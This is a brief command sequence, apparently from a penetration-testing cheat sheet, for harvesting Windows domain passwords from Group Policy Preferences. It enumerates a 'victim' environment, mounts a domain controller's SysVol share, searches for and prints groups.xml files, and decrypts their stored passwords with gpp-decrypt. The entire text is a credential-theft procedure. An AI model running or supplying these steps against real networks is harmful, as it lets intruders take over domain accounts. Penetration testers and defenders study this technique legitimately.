set # Gather information about the environment variables in victim environment
net use X: \\\\DC01\\SysVol # Mount the SysVol share on the Domain Controller as drive X
X:
cd <domain_name>\\Policies
dir /s *.xml # Find user creation policies by searching for groups.xml in policies dir
type <path_to_group_xml_file>
gpp-decrypt # Use this in kali to decrypt passwords